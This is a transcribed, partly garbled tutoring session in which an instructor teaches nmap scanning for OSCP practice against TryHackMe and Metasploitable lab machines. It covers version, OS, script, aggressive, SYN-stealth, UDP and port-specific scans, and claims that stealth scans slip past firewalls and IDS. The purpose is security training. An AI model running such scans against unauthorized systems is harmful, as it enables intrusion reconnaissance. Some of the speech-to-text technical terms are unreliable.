and let's navigate to desktop, cd space desktop and type open VPN space TEC tab key. It will automatically pick up the file name. Yeah, hit enter. Initialization sequence completed. Perfect. Now you have connected and your if you will check in the new terminal, your IP address will be 10.9.4.190. Okay. So we have got connected with our try hack me server and there is this machine TUN0 10.9.4.190. Now we have got this IP address as well as our Metasploitable's IP address. So let's create a file and put both of the IP addresses in that specific file.
Okay.
Okay.
So
Nano
sudo nano.
space. Oh yes, sir.
Mm-hmm.
Sudo nano, and along with it, we give it the sudo nano space and give the file name, any file name, which you can remember for the time being. So go to check out your Kali Metasploitable's IP address. We will be entering that IP address. It was I guess 192.168 something something dot You can directly go with ARP scan. It will give you the IP address on your system. But let's check out with,
Without
okay,
IF
let's use
config.
IF config. Tap in between, sir. Tap in the screen.
Yeah,
Now go for it. IF config. It's 152.129.
129.
Okay. So let's get back to our Kali Linux. Let's give it here 192.168.
192.
152.129.
8.152.4.
129.
Okay. Yeah.
Okay. Now go back to your this one. Try hack me. You know, your blue machine might have also received an IP address. The first tab.
Refresh this.
No, the first tab. The first tab. There are two
Mm-hmm.
tabs open. Yeah. Here. 10.10.44.41. That's the IP address of your blue machine.
Okay.
Okay,
That's all.
we have got the, yes, we have got the IP address that is required now. What we need to do is we need to utilize and scan. So we have gone through only two IP address, two or three different kind of scannings. Now, what we require is we require the version detection scanning, where we will be detecting the version of our target operating system. Sorry, not the version of the operating system, the version of the services which are running. Sir,
Mm-hmm.
Control X, Control X,
Control S, Control X.
X, X, X. Yes.
Yeah, yeah, I did it.
Now, yes, sir. Now, what we require is we require to have the IP address is there. Now, what we require is we require to have the version detection, version of the services which are running on the operating system.
Mm-hmm.
Okay. So let's go for it. Let's go for sudo. Oh, make it the super user, sir.
Okay. Okay.
Sudo space su. Okay. Nmap
Mm-hmm.
space hyphen I capital L, hyphen small I capital L. It is hyphen small I
Okay.
capital L. Give the file name that is iplist.txt. Okay, it will just scan it. Now, what we need is we need to provide it with one more parameter to find the version of the operating system.
Okay.
So for the, sorry, version of the services which are being used. So for that, we
Mhm.
will be using hyphen S capital V. S will be small and V will be caps. Hyphen
Verbose, yeah.
small
Okay.
s capital V. So opposite.
Hyphen small s capital.
Small s
Okay.
capital V. Hit enter.
Mm-hmm.
Now what it's going to do is it will be detecting, giving you the fourth column, which will be telling you the version of the services which are used in the target operating system. So can you see the fourth column, sir?
Mm-hmm.
So it's telling you that port 21 is using service FTP and the version of the product uses VSF TPD 2.3.4.
Yeah.
Okay, same way it will be telling you for all the ports. Now it is scanning for the Windows, that is the blue machine here. So there might be a possibility it might take a little time, but you can
Okay.
press enter or spacebar key just to check whether the info, how much time, how much percentage of the progress has been done. But check out. So it is completed and it has given you the versions of the services or protocols or the products which are being used at that specific port.
Yes.
Okay. Now the thing is why version is important, because for every exploit which we will be running, there will be a specific version defined, and if we don't know the
Yes.
version, then there might be a issue for us. Now, contrarily, we
Hmm.
also need to find out the version of the operating system used here. So for that, we will
Okay.
be using operating system detection scan. So we will be
No.
using hyphen capital O switch here just to find the operating system.
Okay.
The hyphen capital O and hit enter. Now with hyphen capital O, there is a little problem. For sometimes it is not or it will not give you the correct information. It will give you a round of information. Round of
No.
information as in, like, it will be giving you half of the correct information and half information will be a guess there. Like it will tell you it's a Windows operating system, but it won't tell you that which version of Windows we are looking at. Just check out. It says no exact OS match for host. Can you see? Like after the nmap scanning is completed, below the port numbers. Okay.
Mm-hmm.
So for finding the correct information, we will be using another scan named as concat complete scan.
Okay.
Okay, what concat complete scan uses, it deploys some default useful scripts so that we could find out the information and we could utilize that information. So for that, we will be using the switch hyphen small s capital C.
Small s, capital C.
Capital C.
Okay.
Okay. Now it will be giving you not only the basic information but a little advanced information as well. Since it is giving you, it will give you or it will start try to give you maximum correct number of information here. So you will check out the effect here. Just wait a sec. Uh, Okay. Let's do one more thing. Let's deploy this scan a bit later. See, so this is
Okay.
the one most basic important scan which you will be requiring in every of your OSCP's machine. Normally, you won't be getting the results very fast from nmap. But
Mm-hmm.
in the exam time, you will be requiring this scan, that is the rate limit scan. Okay, so we will be defining nmap saying that we require the minimum number of packets to be transmitted per second will be this one. So let's press Control C, and after that we will be deploying the hyphen sc. So give the same command, but we need to append it. Remove that hyphen sc.
Mm-hmm.
Give it hyphen min
Mm-hmm.
hyphen rate without space. Hyphen rate space 10,000. So I am specifying my nmap that minimum rate of packet transmission will be 10,000.
Mm-hmm.
Now give the switch hyphen s capital C. So you will always need to specify this thing, else you will be getting like 4 or 5 hours and you won't be getting much of the information or much of the scan results there.
Okay.
That's something I did and wasted my 3 hours of OSCP.
Oh.
Now hit the enter key and check out how much percentage it has been done.
Yeah, almost need 6%.
And yes, just check out the information about your operating system. It's done for, okay, it's done for your Metasploitable.
Okay. We started
Yeah,
here.
it's completed for,
Connected.
yes,
Okay.
it's completed for Metasploitable yet. So it
Yeah,
will
my
be doing for
Metasploitable 2 is
Windows
getting.
now. Yeah.
Again,
Now check out the
A7
information. Check out the operating system detection scan. So what information do you see?
Windows 7 Professional.
The exact information is about the operating system is right in front of you. So your
Yeah.
operating system detection scan, that is hyphen o, is good, but sometimes where proper virtualization has been deployed, your hyphen o denies to give you the result, the correct result. So at that place we usually use our this one, that is um, your hyphen sc concat complete scan. Now there is
Yeah.
a similar scan here, which goes by the name of aggressive scan, which will give you
Mm,
the same result and the information will be quite the same. But when we talk about the aggressive scan can what you call cause a DOS attack inside a critical infrastructure. So that's why professionals do not use the scan where they are having so much critical APIs or payment gateways running, because it sometimes leads to what you call damage of the APIs or payment gateways. So for that, let's use nmap, the same command, but instead of hyphen sc, you need to go for hyphen capital A.
with minimum rate.
Yes, sir. Minimum rate is compulsory. Don't leave it out. Else your system will keep on scanning over quite a longer time period and you won't be getting the result.
Okay, with hyphen capital A.
Capital A space, we need to specify the time duration. So give it hyphen
Mm-hmm.
capital T space 4. So there is a 0 to 5 is the limit for the 0 or 1. It will be sending the packets on a very fast mode that will become a flood mode. But we don't want to flood it. And 5 will make it very slow, so it won't give us the proper result. So we either go for 3 or we go for 4,
Okay.
hyphen A 4. Sorry, hyphen T 4. Hit enter and it will give you the same result which you have just seen.
Okay.
See, the ultimate result of the scans will be the same. It will give you the same result every time. So, but sometimes there might be a bit of difference of information as in, like sometimes some will give you the better number of banners, sometimes some will give you some other sort of information, but end result will be the same because we are not changing the machine, we are not changing the IP address, we are not changing the service used there. We are just changing the scanning switches or the scanning parameters. Sorry. Okay. So check out the information. The information is completely the same. There is no difference in the information, but rather you might get some couple of information added, like the hop numbers or the trace route information you will be getting. But again, the information is contrarily quite the same as compared to the other one.
Yeah.
Okay, so that's why we use these different scanning services, which will give us the whole same sort of information. So it's all about grabbing different information. Now, same way, we use this scan, that is hyphen A. So we could combine our 3 or 4 different scans for finding the same sort of information. Like let's go for using. S and S, sorry, SV and SC. It will give you the same sort of result which you have gathered from aggressive scan. So let's try it out.
Hyphen.
Instead of hyphen A, give it hyphen SS, sorry, SC, that is your concat complete scan, and hyphen SV. SC, sir, SC. S, capital C.
FC. Okay.
Sir, concat complete scan. Okay, let me type in
Oh, we did that,
hyphen
right? Here the first
SC
one C.
hyphen SC.
SC.
Yes,
Yeah,
yes,
hyphen
yes, yes.
SC. Yeah.
Yeah. So we can not only use them individually, we can just combine it them. So like we can go with SC and SV at the same time.
Okay. You want to specify the time also?
No, no, no.
No need.
Here we don't require to specify the time duration between two different packets transmitted.
Okay.
Okay. So you will be getting the same result. Now, meanwhile it is scanning, let's talk about one more scan, that is half open scan or TCP stealth scan. Okay,
Okay.
so we know how exactly our three-way handshake works, is it?
Yes.
So first it will be sending in
Send, synapse,
synchronization,
back.
then act.
Yes.
Exactly. So
Yes.
how does the user one knows that user two is open for communication? Because he receives the acknowledgement in the second handshake, is it?
Mm-hmm.
So if the user is receiving the acknowledgement in the second term, so it means the port is open and it is ready for connection. So in our synchronization stealth scan or half open scan, what usually happens is we will be sending, or we will be doing a three-way handshake, but an incomplete three-way handshake. How? Like we will be sending the synchronization. If we receive an acknowledgement, it means the port is open and there could be some information. Okay, it means the port is open and there could be some information, so we will stop it and switch to another port. So it's known as
Mm-hmm.
half open scan or TCP stealth scan or synchronization stealth scan.
Yeah, we are not completing the scan.
Exactly, we are not completing the whole of this scan, but rather we are just going for a half open scan which will give us the information about the port, whether the port is open or not open. So in that case, we will be using hyphen S, capital S.
Okay. S as in Sam.
S as in Sam and S as in Sam. Small s, capital S. Yes. Hit
Yeah.
enter. Okay. The result, again, the result will be the same without any, what you call, you all right, sir?
Yeah. Yeah. I just got it. Hiccups.
Okay, so this is one of those scan where we will be using it for bypassing any sort of what you call security
Rules.
parameters. Like the basic thing firewall IPS IDS goes for checking out whether there is a security, like there is a TCP or UDP, sorry, TCP handshake has been connecting or not. So you will be bypassing it with the help of this scan, that is hyphen S, capital S. That's one of the smallest of the scan which we will be performing. Now we can perform our scans on basis, sorry, on basis of some ports.
Mm-hmm.
Okay, so we can make our scan port specific. Let's say the same command hyphen s nmap, the same command will work. Add it with hyphen sc and sv as well. Sc
SV.
and sv, both of them. Sc, concat
Yeah.
yes. Then
Mhm.
specify hyphen p hyphen small p, and with hyphen p we need to specify the port. Let's say let's go for port 135 139 separated by commas. And okay, now it will be just scanning only and only for these two ports which we have specified here.
Okay.
No third port will be scanned apart from these ports. Sometimes we might get some ports which are there, but only specific ports. Okay, so check it out. Okay, so
Yeah.
the
Yeah.
information is quite the same,
Yeah.
but we got
139
only
is
these two
closed in
information.
Metasploitable, but whereas 139 is open here. Oh, okay. 135 is closed, but 135, 139
Ports
is
are
open.
closed.
Yeah.
Alternatively, ports are closed. Okay. Now, apart from this thing, what we can do is our Nmap usually go for only TCP based scanning. Okay, if you might have checked, Nmap performs only TCP based scanning, not any UDP based scanning. So by
Mhm.
default, it will be just performing TCP. What if we feel like our information is there, but it is in the UDP? Okay, so let's again go for simple TCP scan of a range of code that is starts from 130 to 140. Okay, let's give it 130 hyphen 140
Okay.
space hyphen S capital T
Space hyphen F.
S S S as in south,
Okay. Capital
small
T.
s, yes, capital T. So here we are specifying it to go for simple TCP base scan. Hit enter. Though by default it usually goes for the TCP base scan, but let's define it.
No, it is not. It is telling that I have specified more than one type of TCP scan.
Okay, remove hyphen SS. SS is again a simple TCP half open scan, so that's why. Yes, it will work now. Okay, just check out. We are getting all of the ports closed for these TCP at this specific range.
Yes.
Okay, so we are getting only one port, that is a 135 and
135.
139 port open here.
Right.
Now, what we can do is we can change from TCP to UDP. Instead of hyphen ST, provided hyphen S capital U. Enter. Though your UDP scan gonna take a little time comparatively to your TCP scan, but yes, we'll be getting the result here. Hit enter and check. So Uh, okay, 99.14% have been completed. Yeah,
It is
check out.
completed.
Yeah. Now check out the result for the Metasploitable. One, two, three, four, five. Five ports are giving you status as open. Whereas in your TCP scan, you are only getting two ports open, but that too with a different number.
Mm-hmm.
Okay. Now, in case of Windows also, you will be getting somewhat same kind of result where you will be having two different ports or few different ports open, but with different number.
Here 10 ports are open.
Yes, sir. Okay. So see the difference
Mm-hmm.
between the ports. So it is not necessary that you can find information only in your TCP port. So sometimes, like in the next upcoming sessions when we'll be doing the enumeration, we will be also seeing some UDP port like 161 and 162, like SNMP port. So it's not always necessary that you will be getting the information only in TCP, but also you will also get some information in your UDP ports as well. So wherever you feel like I'm not getting any better information, let's better switch for simple TCP and UDP port. Sorry, from TCP
Okay.
to UDP port, it's simply a better to
UDP.
switch. Now there are few more scams. So like we need to grab further more information. Sometimes the information we received is not pretty much clear information. We need some information to go for, like why this port is giving us open state or why this port is getting in the closed state. We need a reason. So we have got a switch named as reason. So the up arrow key for TCP scan,
Mm, what is that?
two times up arrow key, sir.
Mm-hmm.
Yeah. Give it hyphen hyphen reason. REASON. Enter. Now this will give you information if we are declaring some port as open state. Why it is considered to be open state. So it will try to give you the reason for declaring it as the open state or why declaring it as a closed state. So you will get one more column here. Apart from version, you will get another column named as reason. Can you see reason?
Uh-huh. Connection refuse, Synac,
Yes.
Microsoft Windows RPC. Yeah.
Yes.
Synac,
So
Windows 7 portal.
give on the basis of the responses it gets, like whether it is open or closed. If it is open, why we are considering it as an open, and if it is closed, why we are considering it as a closed.
Okay.
Okay. So likewise, we can go for all the port scanning. So here we just give it a range. So if you will just remove the range and check out for all other ports, it will give you a proper reason why we are considering those ports as open close. Like here 135 says synchronization and acknowledgement. Okay. Now
Mm.
remember we have deployed this hyphen TCP scan. Just simply give this one. Remove ST, SV, and SC. Remove all the three switches. Just leave only hyphen hyphen reason. Yes. Hit enter now. Check out. It's gonna give you sync X, sync X, sync X for every user for which it is open. like because we have received a simple last as synchronization and acknowledgement.
Okay.
Okay, same way we could set our nmap to give sorry, to perform
Bless you.
some other kind of scans as in like there are
Okay. Bless you.
thank you sir, there are three different scans when your firewall is up. We yeah, sorry, we perform those three scans completely. So those scans are like your null scan, xmas scan, and fin scan. Okay, so we will
Mm,
learn about those scans in the next session. Plus, along with it, we will also learn about some script scannings.
okay.
Okay, so as of now, just go for performing any take couple of rooms from Try Hack Me and try to perform
Mm,
the scannings on those.
okay.